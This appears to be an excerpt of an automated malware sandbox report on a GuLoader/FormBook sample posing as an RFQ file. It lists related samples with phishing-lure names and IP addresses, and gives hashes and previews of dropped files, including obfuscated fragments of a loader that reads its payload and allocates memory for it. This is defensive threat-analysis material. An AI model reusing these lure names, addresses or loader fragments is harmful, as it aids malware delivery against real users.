                              CN-Invoice-945413571-XXXXX6856-2312053735707600.exeGet hashmaliciousAgentTeslaBrowse
                              • 104.247.165.99
                              bYPQHxUNMF.exeGet hashmaliciousRemcosBrowse
                              • 64.188.18.137
                              bianlian.dllGet hashmaliciousUnknownBrowse
                              • 192.161.48.17
                              bianlian.dllGet hashmaliciousUnknownBrowse
                              • 192.161.48.17
                              bianlian.dllGet hashmaliciousUnknownBrowse
                              • 192.161.48.17
                              TUT-ASUS-I122825.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 208.95.112.1
                              hesaphareketi-01.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 208.95.112.1
                              Swift Copy_HSBC Bank_pdf.bat.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              QUOTATION_MAYQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 208.95.112.1
                              Purchase Order - PO24108267.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                              • 208.95.112.1
                              Invoice-883973938.jsGet hashmaliciousWSHRATBrowse
                              • 208.95.112.1
                              Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                              • 208.95.112.1
                              _____PDF.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                              • 208.95.112.1
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              3b5074b1b5d032e5620f69f9f700ff0ehesaphareketi-01.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 172.67.74.152
                              Swift Copy_HSBC Bank_pdf.bat.exeGet hashmaliciousAgentTeslaBrowse
                              • 172.67.74.152
                              RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeGet hashmaliciousAgentTeslaBrowse
                              • 172.67.74.152
                              SecuriteInfo.com.Trojan-Downloader.Autoit.gen.6551.1850.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 172.67.74.152
                              https://flow.page/dnjetsdocsGet hashmaliciousUnknownBrowse
                              • 172.67.74.152
                              SecuriteInfo.com.Win32.TrojanX-gen.20995.10729.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 172.67.74.152
                              Payment Advice.exeGet hashmaliciousAgentTeslaBrowse
                              • 172.67.74.152
                              retroactive_effective_date_agreement.jsGet hashmaliciousUnknownBrowse
                              • 172.67.74.152
                              JGomKnothX.exeGet hashmaliciousQuasarBrowse
                              • 172.67.74.152
                              retroactive_effective_date_agreement.jsGet hashmaliciousUnknownBrowse
                              • 172.67.74.152
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Users\user\AppData\Local\Temp\nsn397A.tmp\System.dllPO# ROSIT#U00a0MR2309040.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                PO# ROSIT#U00a0MR2309040.exeGet hashmaliciousGuLoaderBrowse
                                  cuenta para pago1.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    comprobante de transferencia.exeGet hashmaliciousGuLoaderBrowse
                                      Grundforbedre39.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        comprobante de transferencia.exeGet hashmaliciousGuLoaderBrowse
                                          cuenta para pago1.exeGet hashmaliciousGuLoaderBrowse
                                            Grundforbedre39.exeGet hashmaliciousGuLoaderBrowse
                                              venerationens.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                C:\Users\user\AppData\Local\Temp\nsiFB67.tmp\System.dllPO# ROSIT#U00a0MR2309040.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  PO# ROSIT#U00a0MR2309040.exeGet hashmaliciousGuLoaderBrowse
                                                    cuenta para pago1.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      comprobante de transferencia.exeGet hashmaliciousGuLoaderBrowse
                                                        Grundforbedre39.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          comprobante de transferencia.exeGet hashmaliciousGuLoaderBrowse
                                                            cuenta para pago1.exeGet hashmaliciousGuLoaderBrowse
                                                              Grundforbedre39.exeGet hashmaliciousGuLoaderBrowse
                                                                venerationens.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):65536
                                                                  Entropy (8bit):1.0226860858894038
                                                                  Encrypted:false
                                                                  SSDEEP:96:nFFGjLOOv10sWKBnoI7Jf2vXIxcQvc6QcEscw3qNxNM+HbHgnoW6He1o8Fa9SAMa:F2LT0HmBUWIjYmYlw6Du76sfAIO8h
                                                                  MD5:8F820C1FE94E91E422B4AF099F4D6354
                                                                  SHA1:E9AF6832DFE2B992EFB9179C978EA97FC340C466
                                                                  SHA-256:45FA5AC366FE7B435FA942E5AFEAE56DAA618852C65940F5BE4EA8375199D3A9
                                                                  SHA-512:21603901B8CD1B7F6100DFBC199E0F33D154F79E94575CEE0B886F2294B36CA6FE185FD99197DB7D39D3AFA3348122226E1CFF14D5EACC019BC30C1DF58DBB14
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.6.2.7.7.0.3.7.0.3.0.0.6.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.6.2.7.7.0.4.0.1.5.4.3.3.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.a.7.e.4.0.3.d.-.3.5.7.2.-.4.f.d.9.-.a.e.9.f.-.d.d.c.f.0.5.2.7.1.4.8.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.6.0.7.2.4.8.7.-.f.3.4.1.-.4.1.e.4.-.a.9.2.b.-.d.7.c.0.2.2.8.8.5.6.7.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.v.e.x.p.l.o.r.e.r.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.d.i.s.c.e.r.n.i.b.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.a.0.-.0.0.0.1.-.0.0.2.7.-.a.7.f.b.-.1.e.2.a.1.b.a.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.d.0.9.f.3.b.2.9.7.7.3.1.7.f.1.0.3.d.8.f.d.f.8.7.2.9.c.9.7.5.6.0.0.0.0.0.9.0.4.!.0.0.0.0.1.5.4.7.e.7.9.7.f.c.8.d.f.e.b.e.4.3.5.9.1.5.8.3.b.7.f.8.c.5.d.1.
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:Mini DuMP crash report, 14 streams, Wed May 8 07:41:43 2024, 0x1205a4 type
                                                                  Category:dropped
                                                                  Size (bytes):72350
                                                                  Entropy (8bit):1.9994362171231905
                                                                  Encrypted:false
                                                                  SSDEEP:192:QwArfp91OTx564n6L5nFfmnyg0ZkX67mpUqbYeizVgfqrWbhVUK6TsAB2PIUvDb6:XKzYTxL65nFfmNknub36Yb/r5I
                                                                  MD5:A0A5120D1AAD57B4C4E334704D61710B
                                                                  SHA1:EEDD5F4298A790F07820454517C5972F65949E2F
                                                                  SHA-256:37D0A6E4DE56110EC4A39CB97592D7F26AB1DD213F7072032B18679AB638B945
                                                                  SHA-512:D5F8B838750AF849AF9367C2C81020846FEAA880D859B10F44F4C4EFA86AA48B93FDB3C2E6183AA0297E5776EEDBB53291061EEE6D1E28D3F1301CAC06BF80B9
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:MDMP..a..... ........,;f............T...............\...........b>..........T.......8...........T............-..............(............!..............................................................................bJ.......!......GenuineIntel...........T............,;f............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):8362
                                                                  Entropy (8bit):3.7005055521858856
                                                                  Encrypted:false
                                                                  SSDEEP:192:R9l7lZNiAc6DfeE/R6YqfSUFh/jSGgmfQCjprO89bGZsfzCm:R9lnNir6DfeE/R6Y6SU7/XgmfQKGyf3
                                                                  MD5:E1F4B6218D374280C753668C573AAE66
                                                                  SHA1:3D3A32AB9E35B62309E0BBB33FFAB83A81DBF674
                                                                  SHA-256:7E857738CBEB6B0E453B1755E65B7C5B1CB3B029F9A9DA8B77C043964AD8062C
                                                                  SHA-512:59D242A9A6B617A2EA8220FA4522B6F40DE61699E81FC4D30015A2EB48E84C559DFED039529E0AEB074EF4A1A53A29005A5673473223D6E2E5EB659C4164E179
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.9.5.2.<./.P.i.
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4838
                                                                  Entropy (8bit):4.518911605900726
                                                                  Encrypted:false
                                                                  SSDEEP:48:cvIwwtl8zsPe702I7VFJ5WS2CfjkLs3rm8M4JqSaFQEyk+q8dCVC1e2H6Ci6d:uILfm7GySPffJzFkxVC1eW6CBd
                                                                  MD5:E7F0AA1EC9380D40327A473975CA57A5
                                                                  SHA1:D951FDDFCE2F6EDF13E2FD9A950A1D6CDBB788AC
                                                                  SHA-256:FFC94576FE661A9983B54AB4F2429356C56A91FC9EB6F2CA6D994F7C83319293
                                                                  SHA-512:DD3EEC20500313788C339DB4A770E4CD522CBCD76084A9B0ED3F392891216BAE579DB6769D5293696C9D146A49BE5EA9501ED24730F78D6D1F617DA7CC27D1AA
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222657653" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="
                                                                  Process:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:modified
                                                                  Size (bytes):48
                                                                  Entropy (8bit):4.7720552088742005
                                                                  Encrypted:false
                                                                  SSDEEP:3:9iUWFXQLQIfLBJXlFGfv:9dmXQkIPeH
                                                                  MD5:FA5BFFAAF001082898D60C4E0F3BE840
                                                                  SHA1:2250E75242DCAA4378FF5F95DBA2125908FD1E3F
                                                                  SHA-256:9512ECF868BD96DC0BEA169AF8D55E7A5B40FBFC8A0CD8E1CEECD8E5C79FE0A9
                                                                  SHA-512:248D19DA639D2E5B1C487F4AE730C2989379221B95E05A08D3E4E3443EE914B85D895A55CB06C100BC279E8C8440AFB76C9C6EBD56D93B1BCF748A67C66FADCD
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:[Load]..Startup=user32::EnumWindows(i r2 ,i 0)..
                                                                  Process:C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):11776
                                                                  Entropy (8bit):5.656126712214018
                                                                  Encrypted:false
                                                                  SSDEEP:192:em24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlESl:m8QIl975eXqlWBrz7YLOlE
                                                                  MD5:A4DD044BCD94E9B3370CCF095B31F896
                                                                  SHA1:17C78201323AB2095BC53184AA8267C9187D5173
                                                                  SHA-256:2E226715419A5882E2E14278940EE8EF0AA648A3EF7AF5B3DC252674111962BC
                                                                  SHA-512:87335A43B9CA13E1300C7C23E702E87C669E2BCF4F6065F0C684FC53165E9C1F091CC4D79A3ECA3910F0518D3B647120AC0BE1A68EAADE2E75EAA64ADFC92C5A
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Joe Sandbox View:
                                                                  • Filename: PO# ROSIT#U00a0MR2309040.exe, Detection: malicious, Browse
                                                                  • Filename: PO# ROSIT#U00a0MR2309040.exe, Detection: malicious, Browse
                                                                  • Filename: cuenta para pago1.exe, Detection: malicious, Browse
                                                                  • Filename: comprobante de transferencia.exe, Detection: malicious, Browse
                                                                  • Filename: Grundforbedre39.exe, Detection: malicious, Browse
                                                                  • Filename: comprobante de transferencia.exe, Detection: malicious, Browse
                                                                  • Filename: cuenta para pago1.exe, Detection: malicious, Browse
                                                                  • Filename: Grundforbedre39.exe, Detection: malicious, Browse
                                                                  • Filename: venerationens.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...zc.W...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):11776
                                                                  Entropy (8bit):5.656126712214018
                                                                  Encrypted:false
                                                                  SSDEEP:192:em24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlESl:m8QIl975eXqlWBrz7YLOlE
                                                                  MD5:A4DD044BCD94E9B3370CCF095B31F896
                                                                  SHA1:17C78201323AB2095BC53184AA8267C9187D5173
                                                                  SHA-256:2E226715419A5882E2E14278940EE8EF0AA648A3EF7AF5B3DC252674111962BC
                                                                  SHA-512:87335A43B9CA13E1300C7C23E702E87C669E2BCF4F6065F0C684FC53165E9C1F091CC4D79A3ECA3910F0518D3B647120AC0BE1A68EAADE2E75EAA64ADFC92C5A
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Joe Sandbox View:
                                                                  • Filename: PO# ROSIT#U00a0MR2309040.exe, Detection: malicious, Browse
                                                                  • Filename: PO# ROSIT#U00a0MR2309040.exe, Detection: malicious, Browse
                                                                  • Filename: cuenta para pago1.exe, Detection: malicious, Browse
                                                                  • Filename: comprobante de transferencia.exe, Detection: malicious, Browse
                                                                  • Filename: Grundforbedre39.exe, Detection: malicious, Browse
                                                                  • Filename: comprobante de transferencia.exe, Detection: malicious, Browse
                                                                  • Filename: cuenta para pago1.exe, Detection: malicious, Browse
                                                                  • Filename: Grundforbedre39.exe, Detection: malicious, Browse
                                                                  • Filename: venerationens.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...zc.W...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):11776
                                                                  Entropy (8bit):5.656126712214018
                                                                  Encrypted:false
                                                                  SSDEEP:192:em24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlESl:m8QIl975eXqlWBrz7YLOlE
                                                                  MD5:A4DD044BCD94E9B3370CCF095B31F896
                                                                  SHA1:17C78201323AB2095BC53184AA8267C9187D5173
                                                                  SHA-256:2E226715419A5882E2E14278940EE8EF0AA648A3EF7AF5B3DC252674111962BC
                                                                  SHA-512:87335A43B9CA13E1300C7C23E702E87C669E2BCF4F6065F0C684FC53165E9C1F091CC4D79A3ECA3910F0518D3B647120AC0BE1A68EAADE2E75EAA64ADFC92C5A
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...zc.W...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.163856189774724
                                                                  Encrypted:false
                                                                  SSDEEP:3:+gMn:8
                                                                  MD5:ECB33F100E1FCA0EB01B36757EF3CAC8
                                                                  SHA1:61DC848DD725DB72746E332D040A032C726C9816
                                                                  SHA-256:8734652A2A9E57B56D6CBD22FA9F305FC4691510606BCD2DFCA248D1BF9E79C7
                                                                  SHA-512:D56951AC8D3EB88020E79F4581CB9282CA40FAA8ADC4D2F5B8864779E28E5229F5DFE13096CF4B373BBC9BC2AC4BFC58955D9420136FB13537F11C137D633C18
                                                                  Malicious:false
                                                                  Preview:[Caps]..Setting=Enabled..
                                                                  Process:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):20939
                                                                  Entropy (8bit):4.565794596290639
                                                                  Encrypted:false
                                                                  SSDEEP:384:iWRhA9ah+ZmOuYA03t8U3rZZ+Tm5lDiAAeF1w9Sgyshfd:1RRoZmP03O4Tluy/w9Sgpd
                                                                  MD5:EEDAA1B9B7289F62ECEC4C5C72E41B54
                                                                  SHA1:044AB802FEF86A73E3166E17CE7DFA5968C2A37F
                                                                  SHA-256:E3E2A70B4BD3EF68873E9960EAFAE455DCA907FDFC38A6E8BF2968BB45E4D428
                                                                  SHA-512:23E6462ACD4234C806A7DDC6DFECDF12A3EBC5F3774623EAE99843C20054C5111C6AD0DD736A8C92507976DC8DFB3CD1CB96190B24F38570D9DAE6A51EF2EE30
                                                                  Malicious:false
                                                                  Preview:....................W...........__.........vv.GG.www....>.........++.7.p......M...S..........).k...e...r...n...e...l.1.3...2.T.:...:...C.))r..ie...a...t...e...F...i...l..De...A...(.UUm... ...r...4... ...,... ...i... ...0...x...8...0...0...0...0...0...0...0...,... ...i... ...0..V,... ...p... ...0...,.*. .88i..5 ...4..p,... ...i... ...0...x...8...0...,... ...i... ...0...)...i..u....r...8...j...k...e.``r...n...e...l...3...2...:...:...S...e...t..vF...i...l...e...P...o.((i...n...t...e...r.i.(.m.i... .a.r...8...,... ...i... ...2..Y3.t.0...1..Y2.YY .^.,... ...i... ...0.33,...i... ...0...)...i.II....r...4.n.j.c.k...e...r.v.n...e..&l...3...2...:...:...V...i...r.IIt.HHu...a...l..~A...l...l...o..<c...(...i.V. ...0...,.NNi... ..G9.U.7...5...0...9...3.H.7...6..@,... ...i... ...0...x..D3...0.110...0.AA,..^ ...i... ...0...x..94.'.0...)...p.......r...2...j...k...e...r...n...e...l...3...2...:...:...R...e...a...d...F...i...l...e...(...i... ..8r...8...,... ..Fi... ...r...2...,... ...i.-- ...9...7...5...0
                                                                  Process:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):344356
                                                                  Entropy (8bit):0.15492680196643652
                                                                  Encrypted:false
                                                                  SSDEEP:384:7rXlzlmQcDRYnkKyZgEQS0Nve9TCgy0tIBEbF1c:PhLuYf60NvpgyN
                                                                  MD5:4DD3DEA89939DCEA7BA228CB3AE48521
                                                                  SHA1:9FFFFF5CFA8C7ED492352666DC9DDC63B6CEEBBA
                                                                  SHA-256:66C670778AF4FA908D07734107F01B4C6987EBF654631A439EAFC645C67A19AF
                                                                  SHA-512:8568AA8669AFDCD0FEE5FD696D4130439502E536877929893CAB09E9527CD0E15C2BA3EEF39738E5410BCF2A1B9E99992BE56994E6BD5AEF0478AE9952B816C8
                                                                  Malicious:false
                                                                  Preview:...................................................................................................................................................................................................#...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................e....................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):81862
                                                                  Entropy (8bit):0.14692328995172985
                                                                  Encrypted:false
                                                                  SSDEEP:24:AipHPZ63M4dFyWvabvaeDzyxikiBgjJh/cOwFmKm0ZJqdm135rOh+Vd:fPoabvNDz0itBgj72mGqdipOh
                                                                  MD5:460B9A5A4DCEA1A8B77246135F04CE46
                                                                  SHA1:48E0000AC5D5F15F7A5422D55F301CFEE608362C
                                                                  SHA-256:04B8977FDA6AA6B4B23CB36F292B0A406305A520B1003F778C730A368751F15E
                                                                  SHA-512:D943544A5E94EB407E913960B2710B4396AAEF06A3CFFD3ACFAF12F08F539D8A11C1EFC0062186AAD294B6B8AFE43B6326836C32F89E6A167C821996157A3012
                                                                  Malicious:false
                                                                  Preview:................................................................................................................................................................................................................................................................................B...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................?......................................................................................................\....................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):461
                                                                  Entropy (8bit):4.328626304758557
                                                                  Encrypted:false
                                                                  SSDEEP:12:ZbwGqQ5C8BnEgl+mYEtEZBRazc0z8TAgN2vCVZVKusDI/QHMlMfR:qGqQ5Cmn4/8HeIvkZVn3I
                                                                  MD5:8738DBE0E63FD9CB038ECC161A057E48
                                                                  SHA1:F2573BB021C4437F7B37C762F06BE3DB541FFED1
                                                                  SHA-256:40F319709FF14773977AFA9166CD634270A4C3605E5F8ADF4581F99390B09B44
                                                                  SHA-512:AF5B7076409179BDFD3B64AF811F30C98D776487D0984E6D4173060E7FC91DD38B117EF8CECC4DB2F5C228857813B5F01A673019F8814BFAF3158DE535DCEE10
                                                                  Malicious:false
                                                                  Preview:uncoffin bolita lovlst malappropriate pence madkurvens..jenspejls retsmiddels nonpensionable,ventriloquys godmodigst recado defervesced bagagebaandet olfactometry palaverous gartneriets internaliserende hawksbill indsejlede..jazzmusiker badevgt tilhngerskares limbous.mistell renaturation nyvurderet ulvetids concealedly aktionsradius zigzagging danskamerikanernes intrikat..retrocaecal sodavandsapparaters shiits nonpopularity moralistisk tittende ignorerende,
                                                                  Process:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):282573
                                                                  Entropy (8bit):7.497672405703838
                                                                  Encrypted:false
                                                                  SSDEEP:6144:BwyBp2Y72fjiTCSRp6tL/mK/noF3e9QpJ/:BwZ9jiuSRp6tL/mKgFv/
                                                                  MD5:C5B37783C9E3EF72EA914EC0A07E3C49
                                                                  SHA1:99F933C6B5587A7D7BB88A4FBE582513B13B96D1
                                                                  SHA-256:03597D99FC47B92840CC2CEEF614C3B96D54F3B27D98496703F4991EA0B1C51E
                                                                  SHA-512:F1A654DCF29432E477877FDA1D262E960DB2C2846A5B415BACB397DD1FE1E006184BEDF36DCF9BB433CD95F5C6D12B05A6A9DD2A808C780EE1AD7C9E1ABF3886
                                                                  Malicious:false
                                                                  Preview:........................ZZZ.....oooooooooo.F......ddd......MM...................SSS..................]...A.......ooo.........................d..rrr...2...q.........dd.....hh...........................GG....t...............zzzzzz...........||||......l...................................----....k...Z.t..W.....DDDD.(((.H...YYYYYYYY....R...............X............V........6666..............................E.........<<.........PP...::..oo........2.YY...x....$.wwww..............................^^..''........vvv...................''......|.................fffff...............i.>>>>......4..............ff./...........H..........U.......P..(...z..F..ww......O.......V.?......................................&.....w.....OOO........{{........>............................}...Z.........=.M..dd.............<.........=.............Q...........................gggg..............._.................&&........................U.}......................K................ll...........44....F....dd....<<<<.......
                                                                  Process:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):251021
                                                                  Entropy (8bit):0.15233351724966
                                                                  Encrypted:false
                                                                  SSDEEP:96:BgbstGqbACSpt6sDrnsb2GcL+89kAycZrXNk:htGuACyIsDrnsb2GcLB9kAycZrXN
                                                                  MD5:CCE043130AE5C9876FD208E552F62A3C
                                                                  SHA1:7BF691565A5A79D5967AB69D4E9C9E31D62820DF
                                                                  SHA-256:5E3E03B9ECF614F4787A39C4070DC96BFC6CEB156F087152A5AF5B939BB00C40
                                                                  SHA-512:F11EA91D5884E25F09E4A02486E97D7E2C9000E08433A86194DB018EBBFB07C57463FBDCE0C56B11BD9D0B3A527A1AF4B00CB347BD9B3EAC5202BB75A358952D
                                                                  Malicious:false
                                                                  Preview:.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................J...................................C......................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):310610
                                                                  Entropy (8bit):0.15654963286459417
                                                                  Encrypted:false
                                                                  SSDEEP:384:8Ao5Nrk9S+Zu74GhopBt6V6u6lICCW32fJX:PoPrkQ+K4Qm+CCWs
                                                                  MD5:BFFCC0B2485A978D470AF5AA5E069BCE
                                                                  SHA1:8276FFA9A2753D74B1EADEAB451DC58E6E087C68
                                                                  SHA-256:500C32280F9E77B0522BD2E5ED72E5A48C5E37D38A4DE0FD626109D63914C19C
                                                                  SHA-512:6C0A6457E5010F5110AC6A1AE2D5A8F05BC787558631978C0BD46B8646629D2104B7E11CCBD9E223DFB27E9116A7D1B1ACCE7438B522F4F1BDA3656D353DBF06
                                                                  Malicious:false
